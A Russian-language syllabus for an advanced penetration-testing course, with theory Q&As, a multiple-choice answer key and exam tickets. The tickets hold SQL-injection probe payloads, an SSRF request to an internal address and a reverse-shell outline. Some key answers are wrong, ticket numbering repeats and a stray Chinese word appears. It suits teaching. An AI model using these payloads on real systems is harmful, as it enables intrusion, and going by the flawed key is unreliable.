Тестировщик безопасности (профессиональный уровень)

Освойте продвинутые методы пентеста, анализ уязвимостей 0-day и эксплуатацию сложных векторов атак. Изучите фаззинг, реверс-инжиниринг, обход современных систем защиты (WAF, EDR, ASLR). Практика на реальных кейсах: от криптографических уязвимостей до APT-симуляции. Готовьтесь к OSCP, OSED и реальным задачам Red Team.

Описание:
Курс для опытных специалистов, углубляющийся в advanced pentesting, анализ и эксплуатацию сложных уязвимостей, включая 0-day и APT-тактики. Акцент на практику: от криптографии до обхода современных систем защиты.

Что предстоит пройти:

  1. Продвинутый пентест:
    — Фаззинг, реверс-инжиниринг, эксплуатация memory corruption (Heap/Stack Overflow, UAF).
    — Обход WAF, EDR, ASLR, DEP.

  2. Криптография:
    — Атаки на реализацию (Side-channel, Padding Oracle).

  3. Сетевые атаки:
    — MITM, VLAN Hopping, эксплуатация протоколов (DNS, BGP).

  4. Web/API Security:
    — Logic flaws, SSRF, десериализация, JWT-атаки.

  5. Red Team:
    — Пост-эксплуатация, persistence, симуляция APT.

Ожидаемые результаты:
▪ Должен уметь:
— Эксплуатировать уязвимости в enterprise-средах.
— Проводить security research (fuzzing, reverse).
— Разрабатывать PoC для сложных векторов.
▪ Должен знать:
— Современные механизмы защиты и методы их обхода.
— Тактики APT-групп и противодействие Forensics.

Важное:
Сертификация: Подготовка к OSCP/OSED и внутреннему экзамену (CTF + реальный пентест).
Формат: 60% практики (лабы, VulnBox), 40% теории.

  1. Что такое SQL-инъекция и как она работает?
    SQL-инъекция - это атака, при которой злоумышленник внедряет вредоносный SQL-код через пользовательский ввод. Работает через уязвимости в приложениях, которые некорректно обрабатывают пользовательские данные перед их использованием в SQL-запросах.

  2. Какие существуют типы XSS-атак?
    Существует три основных типа XSS: Reflected (отраженный), Stored (постоянный) и DOM-based. Reflected XSS возникает, когда скрипт отражается от веб-сервера, Stored сохраняется на сервере, а DOM-based выполняется полностью на стороне клиента.

  3. Как работает CSRF-атака?
    CSRF (Cross-Site Request Forgery) заставляет браузер жертвы выполнять нежелательные действия на доверенном сайте, где пользователь аутентифицирован. Атакующий создает специальную веб-страницу или ссылку, которая автоматически отправляет запрос от имени пользователя.

  4. Что такое SSRF и чем он опасен?
    SSRF (Server-Side Request Forgery) позволяет атакующему заставить сервер делать запросы к внутренним ресурсам. Опасен тем, что может привести к доступу к внутренним системам, обходу firewall и чтению конфиденциальных данных.

  5. Как работает атака XXE?
    XXE (XML External Entity) использует обработку внешних сущностей в XML-документах. Атакующий может читать локальные файлы, выполнять SSRF-атаки или вызывать отказ в обслуживании через специально сформированные XML-документы.

  6. Что такое Buffer Overflow?
    Buffer Overflow - это переполнение буфера, когда программа записывает данные за пределы выделенной памяти. Это может привести к выполнению произвольного кода, краху программы или изменению поведения приложения.

  7. Какие механизмы защиты от переполнения буфера существуют?
    Основные механизмы защиты: DEP (Data Execution Prevention), ASLR (Address Space Layout Randomization), Stack Canaries и Control Flow Guard. DEP предотвращает выполнение кода в области данных, ASLR рандомизирует адреса памяти.

  8. Как работает атака MITM?
    MITM (Man-in-the-Middle) - это перехват и возможная модификация трафика между двумя сторонами. Атакующий позиционирует себя между жертвой и сервером, получая доступ ко всей передаваемой информации.

  9. Что такое ARP Spoofing?
    ARP Spoofing - это техника, при которой атакующий отправляет поддельные ARP-сообщения в локальную сеть, чтобы связать свой MAC-адрес с IP-адресом другого узла. Это позволяет перехватывать трафик, предназначенный для этого узла.

  10. Как защититься от ARP Spoofing?
    Защитные меры включают: использование статических ARP-таблиц, внедрение DHCP snooping, применение портовой безопасности на коммутаторах, использование VPN и реализацию ARP-мониторинга с детектированием аномалий.

  11. Что такое JWT и какие уязвимости в нем возможны?
    JWT (JSON Web Token) - это стандарт для создания токенов доступа. Уязвимости: слабый секретный ключ, использование алгоритма "none", инъекция в заголовки, отсутствие проверки подписи и неограниченное время жизни токена.

  12. Как работает OAuth 2.0?
    OAuth 2.0 - это протокол авторизации, позволяющий приложениям получать ограниченный доступ к учетным записям пользователей. Работает через выдачу токенов доступа вместо передачи учетных данных, поддерживая несколько потоков авторизации.

  13. Что такое Docker breakout?
    Docker breakout - это техника выхода из контейнера на хост-систему. Может быть реализована через уязвимости в ядре, неправильную конфигурацию или злоупотребление возможностями контейнера.

  14. Какие основные угрозы безопасности в Kubernetes?
    Основные угрозы: чрезмерные разрешения подов, уязвимости в etcd, небезопасные сетевые политики, утечки секретов через переменные окружения и неконтролируемый доступ к API Kubernetes.

  15. Что такое Active Directory и основные векторы атак?
    Active Directory - служба каталогов Microsoft. Основные векторы атак: Pass-the-Hash, Golden Ticket, Silver Ticket, DCSync, Kerberoasting и атаки на групповые политики.

  16. Как работает атака Pass-the-Hash?
    Pass-the-Hash позволяет атакующему аутентифицироваться на удаленной системе, используя хэш пароля, без его расшифровки. Работает благодаря тому, что Windows использует хэши для аутентификации.

  17. Что такое WAF и как его обойти?
    WAF (Web Application Firewall) - это система защиты веб-приложений. Обход возможен через: кодирование payload, фрагментацию атаки, использование альтернативных синтаксических конструкций и эксплуатацию временных окон.

  18. Какие уязвимости характерны для GraphQL?
    Основные уязвимости: чрезмерно сложные запросы (DoS), инъекции через аргументы, неправильная настройка прав доступа, утечка данных через introspection и проблемы с кэшированием.

  19. Что такое API Security?
    API Security - это практики защиты интерфейсов программирования приложений. Включает: аутентификацию, авторизацию, валидацию входных данных, ограничение частоты запросов и мониторинг аномальной активности.

  20. Какие основные риски в облачной безопасности?
    Основные риски: неправильная конфигурация сервисов, чрезмерные IAM-разрешения, уязвимости в multi-tenancy архитектуре, утечки данных и недостаточный мониторинг активности.

  21. Что такое Threat Intelligence?
    Threat Intelligence - это сбор и анализ информации о киберугрозах. Включает тактики, техники и процедуры (TTPs) злоумышленников, индикаторы компрометации (IOCs) и контекст угроз.

  22. Как работает модель Kill Chain?
    Модель Kill Chain описывает 7 этапов кибератаки: разведка, создание оружия, доставка, эксплуатация, установка, командование и контроль, действия по достижению целей.

  23. Что такое Red Teaming?
    Red Teaming - это реалистичная симуляция атак для оценки безопасности организации. Отличается от пентеста более комплексным подходом, имитирующим реальных APT-группировок.

  24. Какие этапы включает классический пентест?
    Основные этапы: планирование и разведка, сканирование, получение доступа, поддержание доступа, анализ и зачистка следов, составление отчета.

  25. Что такое OSINT и какие инструменты используются?
    OSINT (Open Source Intelligence) - сбор информации из открытых источников. Инструменты: Maltego, theHarvester, Shodan, SpiderFoot, Recon-ng и Google Dorks.

  26. Как работает методология MITRE ATT&CK?
    MITRE ATT&CK - это матрица тактик и техник, используемых злоумышленниками. Включает 14 тактических категорий (Initial Access, Execution, Persistence и др.) и сотни конкретных техник.

  27. Что такое DevSecOps?
    DevSecOps - это интеграция практик безопасности в процессы разработки и эксплуатации. Основные принципы: автоматизация security-тестов, "security as code", непрерывный мониторинг безопасности.

  28. Как работает принцип "Shift Left" в безопасности?
    "Shift Left" означает перенос security-практик на более ранние этапы SDLC. Включает: статический анализ кода, проверки зависимостей, security-ревью кода и автоматизированное тестирование.

  29. Что такое SAST и DAST?
    SAST (Static Application Security Testing) - анализ исходного кода на уязвимости. DAST (Dynamic Application Security Testing) - тестирование работающего приложения через внешние интерфейсы.

  30. Как работает IAST?
    IAST (Interactive Application Security Testing) сочетает SAST и DAST, работая внутри приложения во время его выполнения. Анализирует поток данных и выполнение кода в реальном времени.

  31. Что такое SCA?
    SCA (Software Composition Analysis) - анализ сторонних компонентов и зависимостей на известные уязвимости. Помогает выявлять проблемы в используемых библиотеках и фреймворках.

  32. Какие существуют стандарты безопасности приложений?
    Основные стандарты: OWASP Top 10, SANS Top 25, PCI DSS, ISO 27001, NIST SP 800-115 и CIS Benchmarks.

  33. Что такое CVE и CVSS?
    CVE (Common Vulnerabilities and Exposures) - система идентификации уязвимостей. CVSS (Common Vulnerability Scoring System) - метод оценки серьезности уязвимостей по шкале от 0 до 10.

  34. Как работает система bug bounty?
    Bug bounty - это программа вознаграждения за обнаружение уязвимостей. Исследователи сообщают об уязвимостях, а компании выплачивают вознаграждения в зависимости от серьезности найденных проблем.

  35. Что такое Zero-Day уязвимость?
    Zero-Day - это уязвимость, неизвестная вендору и не имеющая патча. Особо опасна, так как может эксплуатироваться до того, как будет выпущено исправление.

  36. Как работает атака на цепочку поставок?
    Атака на цепочку поставок (Supply Chain Attack) нацелена на уязвимости в сторонних компонентах или процессах разработки. Примеры: компрометация обновлений ПО или заражение библиотек.

  37. Что такое APT?
    APT (Advanced Persistent Threat) - это целевые, сложные и продолжительные кибератаки, обычно проводимые государственными или хорошо финансируемыми группами.

  38. Как работает атака на DNS?
    DNS-атаки включают: кэш-отравление, спуфинг, амплификацию для DDoS и захват доменов. Могут приводить к перенаправлению трафика или фишингу.

  39. Что такое DDoS и какие типы существуют?
    DDoS (Distributed Denial of Service) - атака на доступность. Типы: объемные (UDP flood), протокольные (SYN flood) и прикладные (HTTP flood).

  40. Как защититься от DDoS?
    Защита включает: фильтрацию тракта, использование CDN, ограничение запросов, blackholing, Anycast и специализированные DDoS-решения.

  41. Что такое криптография и основные алгоритмы?
    Криптография - наука о защите информации. Алгоритмы: симметричные (AES), асимметричные (RSA), хеши (SHA-256) и протоколы (TLS).

  42. Как работает TLS?
    TLS (Transport Layer Security) обеспечивает защищенную передачу данных. Включает handshake для аутентификации и согласования ключей, затем симметричное шифрование трафика.

  43. Что такое PKI?
    PKI (Public Key Infrastructure) - инфраструктура открытых ключей. Включает центры сертификации (CA), регистрационные центры (RA), списки отзыва (CRL) и хранилища сертификатов.

  44. Как работает атака на криптосистемы?
    Атаки включают: brute force, side-channel атаки, криптоанализ и эксплуатацию уязвимостей в реализации алгоритмов.

  45. Что такое HSM?
    HSM (Hardware Security Module) - аппаратный модуль для безопасного хранения криптографических ключей и выполнения операций. Обеспечивает физическую защиту ключей.

  46. Как работает биометрическая аутентификация?
    Биометрия использует уникальные характеристики (отпечатки, лицо, голос). Проблемы: ложные срабатывания, невозможность смены "пароля" и риски утечки биометрических данных.

  47. Что такое MFA?
    MFA (Multi-Factor Authentication) - многофакторная аутентификация. Сочетает: что-то известное (пароль), что-то имеемое (токен) и что-то присущее (биометрия).

  48. Как работают атаки на IoT?
    Атаки на IoT включают: эксплуатацию дефолтных учеток, перехват беспроводного трафика, атаки на прошивки и использование в ботнетах.

  49. Что такое SCADA и какие угрозы?
    SCADA - системы промышленного контроля. Угрозы: устаревшее ПО, отсутствие сегментации, слабая аутентификация и физический доступ к оборудованию.

  50. Как защитить промышленные системы?
    Защита включает: сегментацию сетей, whitelisting приложений, мониторинг аномалий, регулярные обновления и обучение персонала.

  51. Что такое мобильные угрозы?
    Основные угрозы: вредоносные приложения, фишинг, эксплойты для ОС, перехват трафика и кража данных с потерянных устройств.

  52. Как работает анализ мобильных приложений?
    Анализ включает: декомпиляцию, изучение манифеста, проверку хранилища данных, анализ сетевого взаимодействия и тестирование бинарных защит.

  53. Что такое OWASP Mobile Top 10?
    Это список критичных уязвимостей мобильных приложений, включая: некорректную аутентификацию, небезопасное хранение данных и недостаточную защиту API.

  54. Как работают атаки на беспроводные сети?
    Атаки включают: взлом WPA2, Evil Twin, перехват трафика и эксплуатацию уязвимостей в протоколах беспроводной связи.

  55. Что такое RFID-атаки?
    Атаки на системы радиочастотной идентификации: клонирование карт, перехват сигнала, подделка меток и DoS на считыватели.

  56. Как работает социальная инженерия?
    Социальная инженерия манипулирует людьми для получения доступа к информации. Методы: фишинг, претекстинг, baiting и quid pro quo.

  57. Что такое фишинг и его разновидности?
    Фишинг - мошенничество для кражи учетных данных. Разновидности: spear phishing (целевой), whaling (на топ-менеджмент), smishing (SMS) и vishing (голосовой).

  58. Как работают атаки на блокчейн?
    Атаки включают: 51% атаку, эксплуатацию смарт-контрактов, атаки на кошельки и злоупотребление механизмами консенсуса.

  59. Что такое смарт-контракты и их уязвимости?
    Смарт-контракты - программы на блокчейне. Уязвимости: reentrancy, integer overflow, неправильная проверка прав и front-running.

  60. Как работает атака Reentrancy?
    Reentrancy позволяет повторно вызывать функцию до завершения предыдущего вызова. Классический пример - взлом DAO в Ethereum.

  61. Что такое криптоджекинг?
    Криптоджекинг - несанкционированное использование вычислительных ресурсов для майнинга криптовалют. Часто реализуется через веб-скрипты или вредоносное ПО.

  62. Как работают атаки на виртуализацию?
    Атаки включают: VM escape (выход из виртуальной машины), hyperjacking, перехват трафика между VM и эксплуатацию уязвимостей гипервизора.

  63. Что такое контейнерные угрозы?
    Угрозы включают: breakout из контейнера, небезопасные образы, чрезмерные привилегии, утечки секретов и неконтролируемый доступ к API.

  64. Как защитить контейнеры?
    Защита включает: минимальные привилегии, сканирование образов, runtime-защиту, сетевую сегментацию и мониторинг активности.

  65. Что такое серверные угрозы?
    Основные угрозы: эксплуатация уязвимостей, brute force, privilege escalation, backdoors и небезопасные конфигурации.

  66. Как работает атака Pass-the-Ticket?
    Pass-the-Ticket использует украденные Kerberos-билеты для доступа к ресурсам без знания пароля. Вариант атаки на Active Directory.

  67. Что такое лог-анализ для безопасности?
    Анализ логов помогает выявлять аномалии и инциденты. Включает: корреляцию событий, поиск IOC и мониторинг подозрительной активности.

  68. Как работает SIEM?
    SIEM (Security Information and Event Management) собирает и анализирует данные из различных источников для выявления угроз. Основные функции: сбор логов, корреляция событий и генерация алертов.

  69. Что такое EDR?
    EDR (Endpoint Detection and Response) - решения для мониторинга и реагирования на угрозы на конечных точках. Включают: поведенческий анализ, расследование инцидентов и автоматизированный ответ.

  70. Как работает threat hunting?
    Threat hunting - активный поиск угроз в инфраструктуре. Основан на гипотезах, использует анализ логов, метаданных и поведенческих аномалий.

  71. Что такое инцидент-респонс?
    Инцидент-респонс - процесс реагирования на киберинциденты. Этапы: подготовка, обнаружение, сдерживание, ликвидация, восстановление и извлечение уроков.

  72. Как работает цифровая криминалистика?
    Цифровая криминалистика включает: сбор доказательств, анализ дисков, исследование памяти, восстановление данных и документирование цепочки доказательств.

  73. Что такое стандарты реагирования на инциденты?
    Основные стандарты: NIST SP 800-61, ISO 27035 и SANS Incident Handling Process. Описывают лучшие практики реагирования на инциденты.

  74. Как работает киберстрахование?
    Киберстрахование покрывает убытки от киберинцидентов. Учитывает: меры безопасности организации, историю инцидентов и потенциальные риски.

  75. Что такое этичный хакинг?
    Этичный хакинг - легальное тестирование безопасности с согласия владельца системы. Цель - выявление уязвимостей до того, как их найдут злоумышленники.

1. Какой метод чаще всего используется для эксплуатации SQL-инъекции типа Blind?

A) Time-based атака
B) XSS-вектор
C) CSRF-токен
D) DNS-экфильтрация
✅ Ответ: A) Time-based атака

2. Какой инструмент применяется для фаззинга бинарных приложений?

A) Burp Suite
B) AFL (American Fuzzy Lop)
C) Nmap
D) Metasploit
✅ Ответ: B) AFL (American Fuzzy Lop)

3. Какой тип атаки использует уязвимость "Use-After-Free"?

A) SQL-инъекция
B) Memory corruption
C) CSRF
D) SSRF
✅ Ответ: B) Memory corruption

4. Какой протокол уязвим к атаке "VLAN Hopping"?

A) HTTP
B) DNS
C) 802.1Q
D) FTP
✅ Ответ: C) 802.1Q

5. Какой механизм защиты предотвращает выполнение кода в области памяти, помеченной как "только для данных"?

A) ASLR
B) DEP
C) WAF
D) HSTS
✅ Ответ: B) DEP

6. Какой инструмент используется для анализа трафика в локальной сети?

A) Wireshark
B) John the Ripper
C) Hydra
D) Sqlmap
✅ Ответ: A) Wireshark

7. Какой тип атаки позволяет обойти аутентификацию через подделку HTTP-заголовков?

A) XSS
B) CSRF
C) Request Smuggling
D) LDAP-инъекция
✅ Ответ: C) Request Smuggling

8. Какой метод используется для эксплуатации уязвимости "Server-Side Request Forgery" (SSRF)?

A) Перенаправление запросов на внутренние сервисы
B) Подмена сессионных куки
C) SQL-инъекция
D) Фаззинг API
✅ Ответ: A) Перенаправление запросов на внутренние сервисы

9. Какой алгоритм хеширования считается уязвимым к "радужным таблицам"?

A) SHA-256
B) bcrypt
C) MD5
D) Argon2
✅ Ответ: C) MD5

10. Какой механизм в современных ОС рандомизирует адреса загрузки библиотек?

A) DEP
B) ASLR
C) Stack Canary
D) Control Flow Guard
✅ Ответ: B) ASLR

11. Какая уязвимость позволяет злоумышленнику выполнить произвольный код через переполнение буфера?

A) XSS
B) Buffer Overflow
C) CSRF
D) Directory Traversal
✅ Ответ: B) Buffer Overflow

12. Какой инструмент используется для автоматического поиска SQL-инъекций?

A) Nmap
B) Sqlmap
C) Metasploit
D) Aircrack-ng
✅ Ответ: B) Sqlmap

13. Какой метод защиты предотвращает атаки типа "Cross-Site Request Forgery" (CSRF)?

A) CAPTCHA
B) CSRF-токены
C) HTTP Only cookies
D) HSTS
✅ Ответ: B) CSRF-токены

14. Как называется атака, при которой злоумышленник перехватывает и изменяет данные между двумя сторонами?

A) XSS
B) MITM
C) DoS
D) Phishing
✅ Ответ: B) MITM

15. Какой алгоритм шифрования использует асимметричную криптографию?

A) AES
B) RSA
C) SHA-256
D) HMAC
✅ Ответ: B) RSA

16. Какой тип атаки использует поддельные DNS-записи для перенаправления трафика?

A) DNS Spoofing
B) ARP Poisoning
C) SQL-инъекция
D) Brute Force
✅ Ответ: A) DNS Spoofing

17. Какой инструмент применяется для перебора паролей?

A) Wireshark
B) Hydra
C) Burp Suite
D) John the Ripper
✅ Ответ: B) Hydra

18. Какой механизм защиты предотвращает выполнение кода в стеке?

A) ASLR
B) DEP
C) Stack Canary
D) WAF
✅ Ответ: C) Stack Canary

19. Какой протокол уязвим к атаке "ARP Spoofing"?

A) HTTP
B) DNS
C) ARP
D) FTP
✅ Ответ: C) ARP

20. Какой тип атаки использует уязвимости в веб-приложениях для выполнения JavaScript на стороне клиента?

A) CSRF
B) XSS
C) SSRF
D) SQL-инъекция
✅ Ответ: B) XSS

21. Какой инструмент используется для анализа и эксплуатации уязвимостей в веб-приложениях?

A) Nmap
B) Burp Suite
C) Aircrack-ng
D) GDB
✅ Ответ: B) Burp Suite

22. Какой механизм защиты предотвращает подделку межсайтовых запросов?

A) CORS
B) CSP
C) HSTS
D) CSRF-токены
✅ Ответ: D) CSRF-токены

23. Какой тип атаки направлен на перегрузку сервера запросами?

A) MITM
B) DoS
C) XSS
D) SQL-инъекция
✅ Ответ: B) DoS

24. Какой алгоритм хеширования рекомендуется для хранения паролей?

A) MD5
B) SHA-1
C) bcrypt
D) AES
✅ Ответ: C) bcrypt

25. Какой инструмент используется для взлома беспроводных сетей?

A) Wireshark
B) Aircrack-ng
C) Hydra
D) Sqlmap
✅ Ответ: B) Aircrack-ng

26. Какой механизм защиты рандомизирует адреса памяти?

A) DEP
B) ASLR
C) WAF
D) HIPS
✅ Ответ: B) ASLR

27. Какой тип атаки использует поддельные электронные письма для кражи данных?

A) Phishing
B) XSS
C) CSRF
D) SSRF
✅ Ответ: A) Phishing

28. Какой протокол уязвим к атаке "Heartbleed"?

A) HTTP
B) FTP
C) OpenSSL
D) DNS
✅ Ответ: C) OpenSSL

29. Какой инструмент используется для реверс-инжиниринга?

A) IDA Pro
B) Nmap
C) Metasploit
D) Wireshark
✅ Ответ: A) IDA Pro

30. Какой тип атаки использует уязвимости в системе управления сессиями?

A) Session Fixation
B) Buffer Overflow
C) DNS Spoofing
D) ARP Poisoning
✅ Ответ: A) Session Fixation

31. Какой тип атаки позволяет получить несанкционированный доступ к системе, используя физическое устройство?

A) Social Engineering
B) Evil Twin
C) Bad USB
D) DNS Cache Poisoning
✅ Ответ: C) Bad USB

32. Какой инструмент используется для создания фишинговых страниц?

A) SET (Social Engineering Toolkit)
B) Nmap
C) Wireshark
D) GDB
✅ Ответ: A) SET (Social Engineering Toolkit)

33. Какой механизм защиты предотвращает подделку электронной почты?

A) SPF
B) CSRF-токены
C) HSTS
D) DEP
✅ Ответ: A) SPF

34. Какой тип атаки использует уязвимости в протоколе SMB?

A) EternalBlue
B) Heartbleed
C) Shellshock
D) Dirty COW
✅ Ответ: A) EternalBlue

35. Какой алгоритм используется для цифровых подписей?

A) RSA
B) AES
C) MD5
D) SHA-1
✅ Ответ: A) RSA

36. Какой инструмент применяется для анализа защищенности Docker-контейнеров?

A) Docker Bench
B) Lynis
C) OpenVAS
D) Nessus
✅ Ответ: A) Docker Bench

37. Какой тип атаки использует уязвимости в кэше процессора?

A) Spectre
B) Heartbleed
C) SQL-инъекция
D) XSS
✅ Ответ: A) Spectre

38. Какой протокол уязвим к атаке "KRACK"?

A) WPA2
B) SSL
C) HTTP
D) FTP
✅ Ответ: A) WPA2

39. Какой инструмент используется для сканирования уязвимостей в сети?

A) OpenVAS
B) John the Ripper
C) Hydra
D) Aircrack-ng
✅ Ответ: A) OpenVAS

40. Какой механизм защиты предотвращает выполнение кода в куках?

A) HTTP Only
B) CSRF-токены
C) CSP
D) HSTS
✅ Ответ: A) HTTP Only

41. Какой тип атаки использует уязвимости в API веб-приложений?

A) GraphQL-инъекция
B) CSRF
C) DNS Spoofing
D) ARP Poisoning
✅ Ответ: A) GraphQL-инъекция

42. Какой инструмент применяется для анализа бинарных файлов?

A) Ghidra
B) Burp Suite
C) Wireshark
D) Sqlmap
✅ Ответ: A) Ghidra

43. Какой механизм защиты предотвращает межсайтовую подделку запросов?

A) CSP
B) CORS
C) SameSite cookies
D) HSTS
✅ Ответ: C) SameSite cookies

44. Какой тип атаки использует уязвимости в системе доменных имен?

A) DNS Cache Poisoning
B) XSS
C) SQL-инъекция
D) CSRF
✅ Ответ: A) DNS Cache Poisoning

45. Какой алгоритм шифрования использует симметричную криптографию?

A) RSA
B) AES
C) ECC
D) DSA
✅ Ответ: B) AES

46. Какой инструмент используется для анализа трафика SSL/TLS?

A) SSLstrip
B) Wireshark
C) Aircrack-ng
D) Hydra
✅ Ответ: B) Wireshark

47. Какой механизм защиты предотвращает атаки типа "Clickjacking"?

A) X-Frame-Options
B) CSRF-токены
C) HSTS
D) DEP
✅ Ответ: A) X-Frame-Options

48. Какой тип атаки использует уязвимости в системе управления версиями?

A) Git-утечки
B) XSS
C) SQL-инъекция
D) CSRF
✅ Ответ: A) Git-утечки

49. Какой инструмент применяется для анализа уязвимостей в IoT-устройствах?

A) Shodan
B) Nmap
C) Metasploit
D) Burp Suite
✅ Ответ: A) Shodan

50. Какой механизм защиты предотвращает атаки типа "DNS Spoofing"?

A) DNSSEC
B) HSTS
C) CSP
D) SameSite cookies
✅ Ответ: A) DNSSEC

51. Какой тип атаки использует уязвимости в облачных сервисах?

A) AWS S3-утечки
B) XSS
C) SQL-инъекция
D) CSRF
✅ Ответ: A) AWS S3-утечки

52. Какой инструмент используется для анализа уязвимостей в мобильных приложениях?

A) MobSF
B) Wireshark
C) Aircrack-ng
D) Hydra
✅ Ответ: A) MobSF

53. Какой механизм защиты предотвращает атаки типа "Session Hijacking"?

A) Secure cookies
B) CSRF-токены
C) HSTS
D) DEP
✅ Ответ: A) Secure cookies

54. Какой тип атаки использует уязвимости в системе виртуализации?

A) VM Escape
B) XSS
C) SQL-инъекция
D) CSRF
✅ Ответ: A) VM Escape

55. Какой алгоритм используется для создания хеш-сумм файлов?

A) SHA-256
B) RSA
C) AES
D) ECC
✅ Ответ: A) SHA-256

56. Какой инструмент применяется для анализа уязвимостей в блокчейн-сетях?

A) MythX
B) Nmap
C) Metasploit
D) Burp Suite
✅ Ответ: A) MythX

57. Какой механизм защиты предотвращает атаки типа "Directory Traversal"?

A) Input Validation
B) CSRF-токены
C) HSTS
D) DEP
✅ Ответ: A) Input Validation

58. Какой тип атаки использует уязвимости в системе управления контентом (CMS)?

A) WordPress-эксплойты
B) XSS
C) SQL-инъекция
D) CSRF
✅ Ответ: A) WordPress-эксплойты

59. Какой инструмент используется для анализа уязвимостей в API?

A) Postman
B) Wireshark
C) Aircrack-ng
D) Hydra
✅ Ответ: A) Postman

60. Какой механизм защиты предотвращает атаки типа "LDAP-инъекция"?

A) Input Sanitization
B) CSRF-токены
C) HSTS
D) DEP
✅ Ответ: A) Input Sanitization

61. Какой тип атаки использует уязвимости в системе управления базами данных?

A) NoSQL-инъекция
B) XSS
C) CSRF
D) DNS Spoofing
✅ Ответ: A) NoSQL-инъекция

62. Какой инструмент применяется для анализа уязвимостей в микросервисах?

A) OWASP ZAP
B) Nmap
C) Metasploit
D) Burp Suite
✅ Ответ: A) OWASP ZAP

63. Какой механизм защиты предотвращает атаки типа "XML External Entity (XXE)"?

A) Disable DTD
B) CSRF-токены
C) HSTS
D) DEP
✅ Ответ: A) Disable DTD

64. Какой тип атаки использует уязвимости в системе управления идентификацией?

A) OAuth-утечки
B) XSS
C) SQL-инъекция
D) CSRF
✅ Ответ: A) OAuth-утечки

65. Какой алгоритм используется для создания цифровых сертификатов?

A) RSA
B) AES
C) SHA-1
D) HMAC
✅ Ответ: A) RSA

66. Какой инструмент используется для анализа уязвимостей в серверах?

A) Lynis
B) Wireshark
C) Aircrack-ng
D) Hydra
✅ Ответ: A) Lynis

67. Какой механизм защиты предотвращает атаки типа "Server-Side Template Injection (SSTI)"?

A) Sandboxing
B) CSRF-токены
C) HSTS
D) DEP
✅ Ответ: A) Sandboxing

68. Какой тип атаки использует уязвимости в системе управления сессиями?

A) Session Prediction
B) XSS
C) SQL-инъекция
D) CSRF
✅ Ответ: A) Session Prediction

69. Какой инструмент применяется для анализа уязвимостей в облачных хранилищах?

A) CloudSploit
B) Nmap
C) Metasploit
D) Burp Suite
✅ Ответ: A) CloudSploit

70. Какой механизм защиты предотвращает атаки типа "Remote Code Execution (RCE)"?

A) Input Validation
B) CSRF-токены
C) HSTS
D) DEP
✅ Ответ: A) Input Validation

71. Какой тип атаки использует уязвимости в системе управления логированием?

A) Log Injection
B) XSS
C) SQL-инъекция
D) CSRF
✅ Ответ: A) Log Injection

72. Какой инструмент используется для анализа уязвимостей в серверах баз данных?

A) SQLMap
B) Wireshark
C) Aircrack-ng
D) Hydra
✅ Ответ: A) SQLMap

73. Какой механизм защиты предотвращает атаки типа "Cross-Origin Resource Sharing (CORS)"?

A) Proper CORS Headers
B) CSRF-токены
C) HSTS
D) DEP
✅ Ответ: A) Proper CORS Headers

74. Какой тип атаки использует уязвимости в системе управления конфигурацией?

A) Configuration Drift
B) XSS
C) SQL-инъекция
D) CSRF
✅ Ответ: A) Configuration Drift

75. Какой инструмент применяется для анализа уязвимостей в контейнерах Kubernetes?

A) Kube-hunter
B) Nmap
C) Metasploit
D) Burp Suite
✅ Ответ: A) Kube-hunter

Билет №1

Теоретическая часть:

  1. Опишите механизм работы атаки "SQL-инъекция" и методы защиты от неё.
    ✅ Ответ:
    Атака SQL-инъекции заключается во внедрении恶意 SQL-кода через пользовательский ввод.
    Методы защиты:

  • Использование параметризованных запросов

  • Валидация и санитизация входных данных

  • Применение ORM

  1. Что такое "Use-After-Free" и как её эксплуатируют?
    ✅ Ответ:
    Уязвимость, возникающая при обращении к освобождённой области памяти. Эксплуатация через:

  • Перезапись указателя

  • Вызов malicious payload

Практическая часть:
Задание: Напишите Python-скрипт для обнаружения SQL-инъекции в URL-параметрах.
✅ Ответ:

import requests

def check_sql_injection(url, param):
    payloads = ["'", "\"", "1' OR '1'='1"]
    for payload in payloads:
        test_url = f"{url}?{param}={payload}"
        response = requests.get(test_url)
        if "error" in response.text.lower():
            print(f"Vulnerable to SQLi: {test_url}")

 

Билет №2

Теоретическая часть:

  1. Что такое "Buffer Overflow" и какие механизмы защиты существуют?
    ✅ Ответ:
    Переполнение буфера при записи данных за его пределы.
    Защита:

  • DEP (Data Execution Prevention)

  • ASLR (Address Space Layout Randomization)

  1. Опишите этапы пентеста согласно методологии OWASP.
    ✅ Ответ:

  2. Разведка

  3. Анализ уязвимостей

  4. Эксплуатация

  5. Пост-эксплуатация

  6. Отчётность

Практическая часть:
Задание: Напишите команду Nmap для обнаружения открытых портов с выводом в XML.
✅ Ответ:

nmap -sV -oX scan.xml target.com

 

Билет №3

Теоретическая часть:

  1. Как работает атака "ARP Spoofing"?
    ✅ Ответ:
    Подмена MAC-адреса в ARP-таблицах для перенаправления трафика через атакующего.

  2. Что такое "Zero-Day уязвимость"?
    ✅ Ответ:
    Уязвимость, неизвестная вендору и не имеющая патча.

Практическая часть:
Задание: Напишите правило для Suricata для детектирования ARP-спуфинга.
✅ Ответ:

alert arp any any -> any any (msg:"ARP Spoofing Detected"; arp.opcode:1; content:"|00 01|"; sid:1000001;)

 

Билет №5

Теоретическая часть:

  1. Объясните разницу между симметричным и асимметричным шифрованием.
    ✅ Ответ:

  • Симметричное: Один ключ для шифрования/дешифрования (AES)

  • Асимметричное: Пара ключей (RSA)

  1. Что такое "криптостойкость" алгоритма?
    ✅ Ответ:
    Сопротивление алгоритма взлому (например, через brute force).

Практическая часть:
Задание: Зашифруйте файл с помощью AES-256 через OpenSSL.
✅ Ответ:

openssl enc -aes-256-cbc -in file.txt -out file.enc -k passphrase

 

Билет №5

Теоретическая часть:

  1. Что такое SSRF и какие последствия может вызывать эта уязвимость?
    ✅ Ответ:
    Server-Side Request Forgery (SSRF) - уязвимость, позволяющая злоумышленнику выполнять запросы от имени сервера.
    Последствия:

  • Доступ к внутренним системам

  • Обход firewall

  • Чтение метаданных в облачных средах

  1. Какие методы обхода WAF вы знаете?
    ✅ Ответ:

  • Кодирование payload (URL, Unicode, Base64)

  • Разделение атаки на несколько запросов

  • Использование альтернативных синтаксических конструкций

Практическая часть:
Задание: Напишите HTTP-запрос для эксплуатации SSRF к внутреннему сервису 192.168.1.1:8080
✅ Ответ:

GET /proxy?url=http://192.168.1.1:8080/admin HTTP/1.1
Host: vulnerable.com

 

Билет №6

Теоретическая часть:

  1. Объясните принцип работы Reverse Shell.
    ✅ Ответ:
    Техника, при которой атакуемая система инициирует соединение к атакующему, обходя firewall.
    Этапы:

  2. Атакующий слушает порт

  3. Жертва подключается к нему

  4. Получение shell-доступа

  5. Как защититься от MITM-атак?
    ✅ Ответ:

